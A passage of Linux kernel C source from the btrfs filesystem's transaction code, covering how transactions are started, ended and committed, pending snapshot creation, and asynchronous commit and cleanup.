* in ctree.c. The solution used here is to flag ourselves
* with root->in_trans_setup. When this is 1, we're still
* fixing up the reloc trees and everyone must wait.
*
* When this is zero, they can trust root->last_trans and fly
* through btrfs_record_root_in_trans without having to take the
* lock. smp_wmb() makes sure that all the writes above are
* done before we pop in the zero below
*/
btrfs_init_reloc_root(trans, root);
smp_wmb();
root->in_trans_setup = 0;
}
return 0;
}
int btrfs_record_root_in_trans(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
if (!root->ref_cows)
return 0;
/*
* see record_root_in_trans for comments about in_trans_setup usage
* and barriers
*/
smp_rmb();
if (root->last_trans == trans->transid &&
!root->in_trans_setup)
return 0;
mutex_lock(&root->fs_info->reloc_mutex);
record_root_in_trans(trans, root);
mutex_unlock(&root->fs_info->reloc_mutex);
return 0;
}
/* wait for commit against the current transaction to become unblocked
* when this is done, it is safe to start a new transaction, but the current
* transaction might not be fully on disk.
*/
static void wait_current_trans(struct btrfs_root *root)
{
struct btrfs_transaction *cur_trans;
spin_lock(&root->fs_info->trans_lock);
cur_trans = root->fs_info->running_transaction;
if (cur_trans && cur_trans->blocked) {
atomic_inc(&cur_trans->use_count);
spin_unlock(&root->fs_info->trans_lock);
wait_event(root->fs_info->transaction_wait,
!cur_trans->blocked);
put_transaction(cur_trans);
} else {
spin_unlock(&root->fs_info->trans_lock);
}
}
static int may_wait_transaction(struct btrfs_root *root, int type)
{
if (root->fs_info->log_root_recovering)
return 0;
if (type == TRANS_USERSPACE)
return 1;
if (type == TRANS_START &&
!atomic_read(&root->fs_info->open_ioctl_trans))
return 1;
return 0;
}
static struct btrfs_trans_handle *
start_transaction(struct btrfs_root *root, u64 num_items, int type,
enum btrfs_reserve_flush_enum flush)
{
struct btrfs_trans_handle *h;
struct btrfs_transaction *cur_trans;
u64 num_bytes = 0;
int ret;
u64 qgroup_reserved = 0;
if (root->fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR)
return ERR_PTR(-EROFS);
if (current->journal_info) {
WARN_ON(type != TRANS_JOIN && type != TRANS_JOIN_NOLOCK);
h = current->journal_info;
h->use_count++;
WARN_ON(h->use_count > 2);
h->orig_rsv = h->block_rsv;
h->block_rsv = NULL;
goto got_it;
}
/*
* Do the reservation before we join the transaction so we can do all
* the appropriate flushing if need be.
*/
if (num_items > 0 && root != root->fs_info->chunk_root) {
if (root->fs_info->quota_enabled &&
is_fstree(root->root_key.objectid)) {
qgroup_reserved = num_items * root->leafsize;
ret = btrfs_qgroup_reserve(root, qgroup_reserved);
if (ret)
return ERR_PTR(ret);
}
num_bytes = btrfs_calc_trans_metadata_size(root, num_items);
ret = btrfs_block_rsv_add(root,
&root->fs_info->trans_block_rsv,
num_bytes, flush);
if (ret)
return ERR_PTR(ret);
}
again:
h = kmem_cache_alloc(btrfs_trans_handle_cachep, GFP_NOFS);
if (!h)
return ERR_PTR(-ENOMEM);
/*
* If we are JOIN_NOLOCK we're already committing a transaction and
* waiting on this guy, so we don't need to do the sb_start_intwrite
* because we're already holding a ref. We need this because we could
* have raced in and did an fsync() on a file which can kick a commit
* and then we deadlock with somebody doing a freeze.
*
* If we are ATTACH, it means we just want to catch the current
* transaction and commit it, so we needn't do sb_start_intwrite().
*/
if (type < TRANS_JOIN_NOLOCK)
sb_start_intwrite(root->fs_info->sb);
if (may_wait_transaction(root, type))
wait_current_trans(root);
do {
ret = join_transaction(root, type);
if (ret == -EBUSY)
wait_current_trans(root);
} while (ret == -EBUSY);
if (ret < 0) {
/* We must get the transaction if we are JOIN_NOLOCK. */
BUG_ON(type == TRANS_JOIN_NOLOCK);
if (type < TRANS_JOIN_NOLOCK)
sb_end_intwrite(root->fs_info->sb);
kmem_cache_free(btrfs_trans_handle_cachep, h);
return ERR_PTR(ret);
}
cur_trans = root->fs_info->running_transaction;
h->transid = cur_trans->transid;
h->transaction = cur_trans;
h->blocks_used = 0;
h->bytes_reserved = 0;
h->root = root;
h->delayed_ref_updates = 0;
h->use_count = 1;
h->adding_csums = 0;
h->block_rsv = NULL;
h->orig_rsv = NULL;
h->aborted = 0;
h->qgroup_reserved = qgroup_reserved;
h->delayed_ref_elem.seq = 0;
h->type = type;
INIT_LIST_HEAD(&h->qgroup_ref_list);
INIT_LIST_HEAD(&h->new_bgs);
smp_mb();
if (cur_trans->blocked && may_wait_transaction(root, type)) {
btrfs_commit_transaction(h, root);
goto again;
}
if (num_bytes) {
trace_btrfs_space_reservation(root->fs_info, "transaction",
h->transid, num_bytes, 1);
h->block_rsv = &root->fs_info->trans_block_rsv;
h->bytes_reserved = num_bytes;
}
got_it:
btrfs_record_root_in_trans(h, root);
if (!current->journal_info && type != TRANS_USERSPACE)
current->journal_info = h;
return h;
}
struct btrfs_trans_handle *btrfs_start_transaction(struct btrfs_root *root,
int num_items)
{
return start_transaction(root, num_items, TRANS_START,
BTRFS_RESERVE_FLUSH_ALL);
}
struct btrfs_trans_handle *btrfs_start_transaction_lflush(
struct btrfs_root *root, int num_items)
{
return start_transaction(root, num_items, TRANS_START,
BTRFS_RESERVE_FLUSH_LIMIT);
}
struct btrfs_trans_handle *btrfs_join_transaction(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_JOIN, 0);
}
struct btrfs_trans_handle *btrfs_join_transaction_nolock(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_JOIN_NOLOCK, 0);
}
struct btrfs_trans_handle *btrfs_start_ioctl_transaction(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_USERSPACE, 0);
}
struct btrfs_trans_handle *btrfs_attach_transaction(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_ATTACH, 0);
}
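/*
 * Illustrative use of the helpers above (a sketch, not taken from a real
 * caller): reserve space for one item, do the modification, then release
 * the handle.
 *
 *	trans = btrfs_start_transaction(root, 1);
 *	if (IS_ERR(trans))
 *		return PTR_ERR(trans);
 *	...modify the tree...
 *	ret = btrfs_end_transaction(trans, root);
 */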
/* wait for a transaction commit to be fully complete */
static noinline void wait_for_commit(struct btrfs_root *root,
struct btrfs_transaction *commit)
{
wait_event(commit->commit_wait, commit->commit_done);
}
int btrfs_wait_for_commit(struct btrfs_root *root, u64 transid)
{
struct btrfs_transaction *cur_trans = NULL, *t;
int ret = 0;
if (transid) {
if (transid <= root->fs_info->last_trans_committed)
goto out;
ret = -EINVAL;
/* find specified transaction */
spin_lock(&root->fs_info->trans_lock);
list_for_each_entry(t, &root->fs_info->trans_list, list) {
if (t->transid == transid) {
cur_trans = t;
atomic_inc(&cur_trans->use_count);
ret = 0;
break;
}
if (t->transid > transid) {
ret = 0;
break;
}
}
spin_unlock(&root->fs_info->trans_lock);
/* The specified transaction doesn't exist */
if (!cur_trans)
goto out;
} else {
/* find newest transaction that is committing | committed */
spin_lock(&root->fs_info->trans_lock);
list_for_each_entry_reverse(t, &root->fs_info->trans_list,
list) {
if (t->in_commit) {
if (t->commit_done)
break;
cur_trans = t;
atomic_inc(&cur_trans->use_count);
break;
}
}
spin_unlock(&root->fs_info->trans_lock);
if (!cur_trans)
goto out; /* nothing committing|committed */
}
wait_for_commit(root, cur_trans);
put_transaction(cur_trans);
out:
return ret;
}
void btrfs_throttle(struct btrfs_root *root)
{
if (!atomic_read(&root->fs_info->open_ioctl_trans))
wait_current_trans(root);
}
static int should_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
ret = btrfs_block_rsv_check(root, &root->fs_info->global_block_rsv, 5);
return ret ? 1 : 0;
}
int btrfs_should_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
struct btrfs_transaction *cur_trans = trans->transaction;
int updates;
int err;
smp_mb();
if (cur_trans->blocked || cur_trans->delayed_refs.flushing)
return 1;
updates = trans->delayed_ref_updates;
trans->delayed_ref_updates = 0;
if (updates) {
err = btrfs_run_delayed_refs(trans, root, updates);
if (err) /* Error code will also eval true */
return err;
}
return should_end_transaction(trans, root);
}
static int __btrfs_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root, int throttle)
{
struct btrfs_transaction *cur_trans = trans->transaction;
struct btrfs_fs_info *info = root->fs_info;
int count = 0;
int lock = (trans->type != TRANS_JOIN_NOLOCK);
int err = 0;
if (--trans->use_count) {
trans->block_rsv = trans->orig_rsv;
return 0;
}
/*
* do the qgroup accounting as early as possible
*/
err = btrfs_delayed_refs_qgroup_accounting(trans, info);
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
/*
* the same root has to be passed to start_transaction and
* end_transaction. Subvolume quota depends on this.
*/
WARN_ON(trans->root != root);
if (trans->qgroup_reserved) {
btrfs_qgroup_free(root, trans->qgroup_reserved);
trans->qgroup_reserved = 0;
}
if (!list_empty(&trans->new_bgs))
btrfs_create_pending_block_groups(trans, root);
while (count < 2) {
unsigned long cur = trans->delayed_ref_updates;
trans->delayed_ref_updates = 0;
if (cur &&
trans->transaction->delayed_refs.num_heads_ready > 64) {
trans->delayed_ref_updates = 0;
btrfs_run_delayed_refs(trans, root, cur);
} else {
break;
}
count++;
}
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
if (!list_empty(&trans->new_bgs))
btrfs_create_pending_block_groups(trans, root);
if (lock && !atomic_read(&root->fs_info->open_ioctl_trans) &&
should_end_transaction(trans, root)) {
trans->transaction->blocked = 1;
smp_wmb();
}
if (lock && cur_trans->blocked && !cur_trans->in_commit) {
if (throttle) {
/*
* We may race with somebody else here so end up having
* to call end_transaction on ourselves again, so inc
* our use_count.
*/
trans->use_count++;
return btrfs_commit_transaction(trans, root);
} else {
wake_up_process(info->transaction_kthread);
}
}
if (trans->type < TRANS_JOIN_NOLOCK)
sb_end_intwrite(root->fs_info->sb);
WARN_ON(cur_trans != info->running_transaction);
WARN_ON(atomic_read(&cur_trans->num_writers) < 1);
atomic_dec(&cur_trans->num_writers);
smp_mb();
if (waitqueue_active(&cur_trans->writer_wait))
wake_up(&cur_trans->writer_wait);
put_transaction(cur_trans);
if (current->journal_info == trans)
current->journal_info = NULL;
if (throttle)
btrfs_run_delayed_iputs(root);
if (trans->aborted ||
root->fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR) {
err = -EIO;
}
assert_qgroups_uptodate(trans);
memset(trans, 0, sizeof(*trans));
kmem_cache_free(btrfs_trans_handle_cachep, trans);
return err;
}
int btrfs_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
ret = __btrfs_end_transaction(trans, root, 0);
if (ret)
return ret;
return 0;
}
int btrfs_end_transaction_throttle(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
ret = __btrfs_end_transaction(trans, root, 1);
if (ret)
return ret;
return 0;
}
int btrfs_end_transaction_dmeta(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
return __btrfs_end_transaction(trans, root, 1);
}
/*
* when btree blocks are allocated, they have some corresponding bits set for
* them in one of two extent_io trees. This is used to make sure all of
* those extents are sent to disk but does not wait on them
*/
int btrfs_write_marked_extents(struct btrfs_root *root,
struct extent_io_tree *dirty_pages, int mark)
{
int err = 0;
int werr = 0;
struct address_space *mapping = root->fs_info->btree_inode->i_mapping;
struct extent_state *cached_state = NULL;
u64 start = 0;
u64 end;
while (!find_first_extent_bit(dirty_pages, start, &start, &end,
mark, &cached_state)) {
convert_extent_bit(dirty_pages, start, end, EXTENT_NEED_WAIT,
mark, &cached_state, GFP_NOFS);
cached_state = NULL;
err = filemap_fdatawrite_range(mapping, start, end);
if (err)
werr = err;
cond_resched();
start = end + 1;
}
if (err)
werr = err;
return werr;
}
/*
* when btree blocks are allocated, they have some corresponding bits set for
* them in one of two extent_io trees. This is used to make sure all of
* those extents are on disk for transaction or log commit. We wait
* on all the pages and clear them from the dirty pages state tree
*/
int btrfs_wait_marked_extents(struct btrfs_root *root,
struct extent_io_tree *dirty_pages, int mark)
{
int err = 0;
int werr = 0;
struct address_space *mapping = root->fs_info->btree_inode->i_mapping;
struct extent_state *cached_state = NULL;
u64 start = 0;
u64 end;
while (!find_first_extent_bit(dirty_pages, start, &start, &end,
EXTENT_NEED_WAIT, &cached_state)) {
clear_extent_bit(dirty_pages, start, end, EXTENT_NEED_WAIT,
0, 0, &cached_state, GFP_NOFS);
err = filemap_fdatawait_range(mapping, start, end);
if (err)
werr = err;
cond_resched();
start = end + 1;
}
if (err)
werr = err;
return werr;
}
/*
* when btree blocks are allocated, they have some corresponding bits set for
* them in one of two extent_io trees. This is used to make sure all of
* those extents are on disk for transaction or log commit
*/
int btrfs_write_and_wait_marked_extents(struct btrfs_root *root,
struct extent_io_tree *dirty_pages, int mark)
{
int ret;
int ret2;
ret = btrfs_write_marked_extents(root, dirty_pages, mark);
ret2 = btrfs_wait_marked_extents(root, dirty_pages, mark);
if (ret)
return ret;
if (ret2)
return ret2;
return 0;
}
int btrfs_write_and_wait_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
if (!trans || !trans->transaction) {
struct inode *btree_inode;
btree_inode = root->fs_info->btree_inode;
return filemap_write_and_wait(btree_inode->i_mapping);
}
return btrfs_write_and_wait_marked_extents(root,
&trans->transaction->dirty_pages,
EXTENT_DIRTY);
}
/*
* this is used to update the root pointer in the tree of tree roots.
*
* But, in the case of the extent allocation tree, updating the root
* pointer may allocate blocks which may change the root of the extent
* allocation tree.
*
* So, this loops and repeats and makes sure the cowonly root didn't
* change while the root pointer was being updated in the metadata.
*/
static int update_cowonly_root(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
u64 old_root_bytenr;
u64 old_root_used;
struct btrfs_root *tree_root = root->fs_info->tree_root;
old_root_used = btrfs_root_used(&root->root_item);
btrfs_write_dirty_block_groups(trans, root);
while (1) {
old_root_bytenr = btrfs_root_bytenr(&root->root_item);
if (old_root_bytenr == root->node->start &&
old_root_used == btrfs_root_used(&root->root_item))
break;
btrfs_set_root_node(&root->root_item, root->node);
ret = btrfs_update_root(trans, tree_root,
&root->root_key,
&root->root_item);
if (ret)
return ret;
old_root_used = btrfs_root_used(&root->root_item);
ret = btrfs_write_dirty_block_groups(trans, root);
if (ret)
return ret;
}
if (root != root->fs_info->extent_root)
switch_commit_root(root);
return 0;
}
/*
* update all the cowonly tree roots on disk
*
* The error handling in this function may not be obvious. Any of the
* failures will cause the file system to go offline. We still need
* to clean up the delayed refs.
*/
static noinline int commit_cowonly_roots(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
struct btrfs_fs_info *fs_info = root->fs_info;
struct list_head *next;
struct extent_buffer *eb;
int ret;
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret)
return ret;
eb = btrfs_lock_root_node(fs_info->tree_root);
ret = btrfs_cow_block(trans, fs_info->tree_root, eb, NULL,
0, &eb);
btrfs_tree_unlock(eb);
free_extent_buffer(eb);
if (ret)
return ret;
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret)
return ret;
ret = btrfs_run_dev_stats(trans, root->fs_info);
WARN_ON(ret);
ret = btrfs_run_dev_replace(trans, root->fs_info);
WARN_ON(ret);
ret = btrfs_run_qgroups(trans, root->fs_info);
BUG_ON(ret);
/* run_qgroups might have added some more refs */
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
BUG_ON(ret);
while (!list_empty(&fs_info->dirty_cowonly_roots)) {
next = fs_info->dirty_cowonly_roots.next;
list_del_init(next);
root = list_entry(next, struct btrfs_root, dirty_list);
ret = update_cowonly_root(trans, root);
if (ret)
return ret;
}
down_write(&fs_info->extent_commit_sem);
switch_commit_root(fs_info->extent_root);
up_write(&fs_info->extent_commit_sem);
btrfs_after_dev_replace_commit(fs_info);
return 0;
}
/*
* dead roots are old snapshots that need to be deleted. This allocates
* a dirty root struct and adds it into the list of dead roots that need to
* be deleted
*/
int btrfs_add_dead_root(struct btrfs_root *root)
{
spin_lock(&root->fs_info->trans_lock);
list_add(&root->root_list, &root->fs_info->dead_roots);
spin_unlock(&root->fs_info->trans_lock);
return 0;
}
/*
* update all the fs tree roots on disk
*/
static noinline int commit_fs_roots(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
struct btrfs_root *gang[8];
struct btrfs_fs_info *fs_info = root->fs_info;
int i;
int ret;
int err = 0;
spin_lock(&fs_info->fs_roots_radix_lock);
while (1) {
ret = radix_tree_gang_lookup_tag(&fs_info->fs_roots_radix,
(void **)gang, 0,
ARRAY_SIZE(gang),
BTRFS_ROOT_TRANS_TAG);
if (ret == 0)
break;
for (i = 0; i < ret; i++) {
root = gang[i];
radix_tree_tag_clear(&fs_info->fs_roots_radix,
(unsigned long)root->root_key.objectid,
BTRFS_ROOT_TRANS_TAG);
spin_unlock(&fs_info->fs_roots_radix_lock);
btrfs_free_log(trans, root);
btrfs_update_reloc_root(trans, root);
btrfs_orphan_commit_root(trans, root);
btrfs_save_ino_cache(root, trans);
/* see comments in should_cow_block() */
root->force_cow = 0;
smp_wmb();
if (root->commit_root != root->node) {
mutex_lock(&root->fs_commit_mutex);
switch_commit_root(root);
btrfs_unpin_free_ino(root);
mutex_unlock(&root->fs_commit_mutex);
btrfs_set_root_node(&root->root_item,
root->node);
}
err = btrfs_update_root(trans, fs_info->tree_root,
&root->root_key,
&root->root_item);
spin_lock(&fs_info->fs_roots_radix_lock);
if (err)
break;
}
}
spin_unlock(&fs_info->fs_roots_radix_lock);
return err;
}
/*
* defrag a given btree. If cacheonly == 1, this won't read from the disk,
* otherwise every leaf in the btree is read and defragged.
*/
int btrfs_defrag_root(struct btrfs_root *root, int cacheonly)
{
struct btrfs_fs_info *info = root->fs_info;
struct btrfs_trans_handle *trans;
int ret;
if (xchg(&root->defrag_running, 1))
return 0;
while (1) {
trans = btrfs_start_transaction(root, 0);
if (IS_ERR(trans))
return PTR_ERR(trans);
ret = btrfs_defrag_leaves(trans, root, cacheonly);
btrfs_end_transaction(trans, root);
btrfs_btree_balance_dirty(info->tree_root);
cond_resched();
if (btrfs_fs_closing(root->fs_info) || ret != -EAGAIN)
break;
}
root->defrag_running = 0;
return ret;
}
/*
* new snapshots need to be created at a very specific time in the
* transaction commit. This does the actual creation
*/
static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
struct btrfs_fs_info *fs_info,
struct btrfs_pending_snapshot *pending)
{
struct btrfs_key key;
struct btrfs_root_item *new_root_item;
struct btrfs_root *tree_root = fs_info->tree_root;
struct btrfs_root *root = pending->root;
struct btrfs_root *parent_root;
struct btrfs_block_rsv *rsv;
struct inode *parent_inode;
struct btrfs_path *path;
struct btrfs_dir_item *dir_item;
struct dentry *parent;
struct dentry *dentry;
struct extent_buffer *tmp;
struct extent_buffer *old;
struct timespec cur_time = CURRENT_TIME;
int ret;
u64 to_reserve = 0;
u64 index = 0;
u64 objectid;
u64 root_flags;
uuid_le new_uuid;
path = btrfs_alloc_path();
if (!path) {
ret = pending->error = -ENOMEM;
goto path_alloc_fail;
}
new_root_item = kmalloc(sizeof(*new_root_item), GFP_NOFS);
if (!new_root_item) {
ret = pending->error = -ENOMEM;
goto root_item_alloc_fail;
}
ret = btrfs_find_free_objectid(tree_root, &objectid);
if (ret) {
pending->error = ret;
goto no_free_objectid;
}
btrfs_reloc_pre_snapshot(trans, pending, &to_reserve);
if (to_reserve > 0) {
ret = btrfs_block_rsv_add(root, &pending->block_rsv,
to_reserve,
BTRFS_RESERVE_NO_FLUSH);
if (ret) {
pending->error = ret;
goto no_free_objectid;
}
}
ret = btrfs_qgroup_inherit(trans, fs_info, root->root_key.objectid,
objectid, pending->inherit);
if (ret) {
pending->error = ret;
goto no_free_objectid;
}
key.objectid = objectid;
key.offset = (u64)-1;
key.type = BTRFS_ROOT_ITEM_KEY;
rsv = trans->block_rsv;
trans->block_rsv = &pending->block_rsv;
dentry = pending->dentry;
parent = dget_parent(dentry);
parent_inode = parent->d_inode;
parent_root = BTRFS_I(parent_inode)->root;
record_root_in_trans(trans, parent_root);
/*
* insert the directory item
*/
ret = btrfs_set_inode_index(parent_inode, &index);
BUG_ON(ret); /* -ENOMEM */
/* check if there is a file/dir which has the same name. */
dir_item = btrfs_lookup_dir_item(NULL, parent_root, path,
btrfs_ino(parent_inode),
dentry->d_name.name,
dentry->d_name.len, 0);
if (dir_item != NULL && !IS_ERR(dir_item)) {
pending->error = -EEXIST;
goto fail;
} else if (IS_ERR(dir_item)) {
ret = PTR_ERR(dir_item);
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_release_path(path);
/*
* pull in the delayed directory update
* and the delayed inode item
* otherwise we corrupt the FS during
* snapshot
*/
ret = btrfs_run_delayed_items(trans, root);
if (ret) { /* Transaction aborted */
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
record_root_in_trans(trans, root);
btrfs_set_root_last_snapshot(&root->root_item, trans->transid);
memcpy(new_root_item, &root->root_item, sizeof(*new_root_item));
btrfs_check_and_init_root_item(new_root_item);
root_flags = btrfs_root_flags(new_root_item);
if (pending->readonly)
root_flags |= BTRFS_ROOT_SUBVOL_RDONLY;
else
root_flags &= ~BTRFS_ROOT_SUBVOL_RDONLY;
btrfs_set_root_flags(new_root_item, root_flags);
btrfs_set_root_generation_v2(new_root_item,
trans->transid);
uuid_le_gen(&new_uuid);
memcpy(new_root_item->uuid, new_uuid.b, BTRFS_UUID_SIZE);
memcpy(new_root_item->parent_uuid, root->root_item.uuid,
BTRFS_UUID_SIZE);
new_root_item->otime.sec = cpu_to_le64(cur_time.tv_sec);
new_root_item->otime.nsec = cpu_to_le32(cur_time.tv_nsec);
btrfs_set_root_otransid(new_root_item, trans->transid);
memset(&new_root_item->stime, 0, sizeof(new_root_item->stime));
memset(&new_root_item->rtime, 0, sizeof(new_root_item->rtime));
btrfs_set_root_stransid(new_root_item, 0);
btrfs_set_root_rtransid(new_root_item, 0);
old = btrfs_lock_root_node(root);
ret = btrfs_cow_block(trans, root, old, NULL, 0, &old);
if (ret) {
btrfs_tree_unlock(old);
free_extent_buffer(old);
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_set_lock_blocking(old);
ret = btrfs_copy_root(trans, root, old, &tmp, objectid);
/* clean up in any case */
btrfs_tree_unlock(old);
free_extent_buffer(old);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
/* see comments in should_cow_block() */
root->force_cow = 1;
smp_wmb();
btrfs_set_root_node(new_root_item, tmp);
/* record when the snapshot was created in key.offset */
key.offset = trans->transid;
ret = btrfs_insert_root(trans, tree_root, &key, new_root_item);
btrfs_tree_unlock(tmp);
free_extent_buffer(tmp);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
/*
* insert root back/forward references
*/
ret = btrfs_add_root_ref(trans, tree_root, objectid,
parent_root->root_key.objectid,
btrfs_ino(parent_inode), index,
dentry->d_name.name, dentry->d_name.len);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
key.offset = (u64)-1;
pending->snap = btrfs_read_fs_root_no_name(root->fs_info, &key);
if (IS_ERR(pending->snap)) {
ret = PTR_ERR(pending->snap);
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
ret = btrfs_reloc_post_snapshot(trans, pending);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
ret = btrfs_insert_dir_item(trans, parent_root,
dentry->d_name.name, dentry->d_name.len,
parent_inode, &key,
BTRFS_FT_DIR, index);
/* We have checked the name at the beginning, so it is impossible. */
BUG_ON(ret == -EEXIST);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_i_size_write(parent_inode, parent_inode->i_size +
dentry->d_name.len * 2);
parent_inode->i_mtime = parent_inode->i_ctime = CURRENT_TIME;
ret = btrfs_update_inode_fallback(trans, parent_root, parent_inode);
if (ret)
btrfs_abort_transaction(trans, root, ret);
fail:
dput(parent);
trans->block_rsv = rsv;
no_free_objectid:
kfree(new_root_item);
root_item_alloc_fail:
btrfs_free_path(path);
path_alloc_fail:
btrfs_block_rsv_release(root, &pending->block_rsv, (u64)-1);
return ret;
}
/*
* create all the snapshots we've scheduled for creation
*/
static noinline int create_pending_snapshots(struct btrfs_trans_handle *trans,
struct btrfs_fs_info *fs_info)
{
struct btrfs_pending_snapshot *pending;
struct list_head *head = &trans->transaction->pending_snapshots;
list_for_each_entry(pending, head, list)
create_pending_snapshot(trans, fs_info, pending);
return 0;
}
static void update_super_roots(struct btrfs_root *root)
{
struct btrfs_root_item *root_item;
struct btrfs_super_block *super;
super = root->fs_info->super_copy;
root_item = &root->fs_info->chunk_root->root_item;
super->chunk_root = root_item->bytenr;
super->chunk_root_generation = root_item->generation;
super->chunk_root_level = root_item->level;
root_item = &root->fs_info->tree_root->root_item;
super->root = root_item->bytenr;
super->generation = root_item->generation;
super->root_level = root_item->level;
if (btrfs_test_opt(root, SPACE_CACHE))
super->cache_generation = root_item->generation;
}
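/* return non-zero if the currently running transaction has entered its commit phase */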
int btrfs_transaction_in_commit(struct btrfs_fs_info *info)
{
int ret = 0;
spin_lock(&info->trans_lock);
if (info->running_transaction)
ret = info->running_transaction->in_commit;
spin_unlock(&info->trans_lock);
return ret;
}
int btrfs_transaction_blocked(struct btrfs_fs_info *info)
{
int ret = 0;
spin_lock(&info->trans_lock);
if (info->running_transaction)
ret = info->running_transaction->blocked;
spin_unlock(&info->trans_lock);
return ret;
}
/*
* wait for the current transaction commit to start and block subsequent
* transaction joins
*/
static void wait_current_trans_commit_start(struct btrfs_root *root,
struct btrfs_transaction *trans)
{
wait_event(root->fs_info->transaction_blocked_wait, trans->in_commit);
}
/*
* wait for the current transaction to start and then become unblocked.
* caller holds ref.
*/
static void wait_current_trans_commit_start_and_unblock(struct btrfs_root *root,
struct btrfs_transaction *trans)
{
wait_event(root->fs_info->transaction_wait,
trans->commit_done || (trans->in_commit && !trans->blocked));
}
/*
* commit transactions asynchronously. once btrfs_commit_transaction_async
* returns, any subsequent transaction will not be allowed to join.
*/
struct btrfs_async_commit {
struct btrfs_trans_handle *newtrans;
struct btrfs_root *root;
struct delayed_work work;
};
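/* delayed-work handler that performs the actual commit for btrfs_commit_transaction_async() */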
static void do_async_commit(struct work_struct *work)
{
struct btrfs_async_commit *ac =
container_of(work, struct btrfs_async_commit, work.work);
/*
* We've got freeze protection passed with the transaction.
* Tell lockdep about it.
*/
if (ac->newtrans->type < TRANS_JOIN_NOLOCK)
rwsem_acquire_read(
&ac->root->fs_info->sb->s_writers.lock_map[SB_FREEZE_FS-1],
0, 1, _THIS_IP_);
current->journal_info = ac->newtrans;
btrfs_commit_transaction(ac->newtrans, ac->root);
kfree(ac);
}
int btrfs_commit_transaction_async(struct btrfs_trans_handle *trans,
struct btrfs_root *root,
int wait_for_unblock)
{
struct btrfs_async_commit *ac;
struct btrfs_transaction *cur_trans;
ac = kmalloc(sizeof(*ac), GFP_NOFS);
if (!ac)
return -ENOMEM;
INIT_DELAYED_WORK(&ac->work, do_async_commit);
ac->root = root;
ac->newtrans = btrfs_join_transaction(root);
if (IS_ERR(ac->newtrans)) {
int err = PTR_ERR(ac->newtrans);
kfree(ac);
return err;
}
/* take transaction reference */
cur_trans = trans->transaction;
atomic_inc(&cur_trans->use_count);
btrfs_end_transaction(trans, root);
/*
* Tell lockdep we've released the freeze rwsem, since the
* async commit thread will be the one to unlock it.
*/
if (trans->type < TRANS_JOIN_NOLOCK)
rwsem_release(
&root->fs_info->sb->s_writers.lock_map[SB_FREEZE_FS-1],
1, _THIS_IP_);
schedule_delayed_work(&ac->work, 0);
/* wait for transaction to start and unblock */
if (wait_for_unblock)
wait_current_trans_commit_start_and_unblock(root, cur_trans);
else
wait_current_trans_commit_start(root, cur_trans);
if (current->journal_info == trans)
current->journal_info = NULL;
put_transaction(cur_trans);
return 0;
}
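/*
 * abort a transaction that failed to commit: unhook it from the running
 * transaction state, clean it up, drop the extra references and free the
 * handle
 */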
static void cleanup_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root, int err)
{
struct btrfs_transaction *cur_trans = trans->transaction;
WARN_ON(trans->use_count > 1);
btrfs_abort_transaction(trans, root, err);
spin_lock(&root->fs_info->trans_lock);
list_del_init(&cur_trans->list);
if (cur_trans == root->fs_info->running_transaction) {
root->fs_info->running_transaction = NULL;
root->fs_info->trans_no_join = 0;
}
spin_unlock(&root->fs_info->trans_lock);
btrfs_cleanup_one_transaction(trans->transaction, root);
put_transaction(cur_trans);
put_transaction(cur_trans);
trace_btrfs_transaction_commit(root);
btrfs_scrub_continue(root);
if (current->journal_info == trans)
current->journal_info = NULL;
kmem_cache_free(btrfs_trans_handle_cachep, trans);
}
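/*
 * flush delalloc and ordered extents when required, then run the delayed
 * items, qgroup accounting and ordered operations that must finish before
 * the commit can proceed
 */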
static int btrfs_flush_all_pending_stuffs(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int flush_on_commit = btrfs_test_opt(root, FLUSHONCOMMIT);
int snap_pending = 0;
int ret;
if (!flush_on_commit) {
spin_lock(&root->fs_info->trans_lock);
if (!list_empty(&trans->transaction->pending_snapshots))
snap_pending = 1;
spin_unlock(&root->fs_info->trans_lock);
}
if (flush_on_commit || snap_pending) {
btrfs_start_delalloc_inodes(root, 1);
btrfs_wait_ordered_extents(root, 1);
}
ret = btrfs_run_delayed_items(trans, root);
if (ret)
return ret;
/*
* running the delayed items may have added new refs. account
* them now so that they hinder processing of more delayed refs
* as little as possible.
*/
btrfs_delayed_refs_qgroup_accounting(trans, root->fs_info);
/*
* rename doesn't use btrfs_join_transaction, so once we
* set the transaction to blocked above, we aren't going
* to get any new ordered operations. We can safely run
* it here and know for sure that nothing new will be added
* to the list.
*/
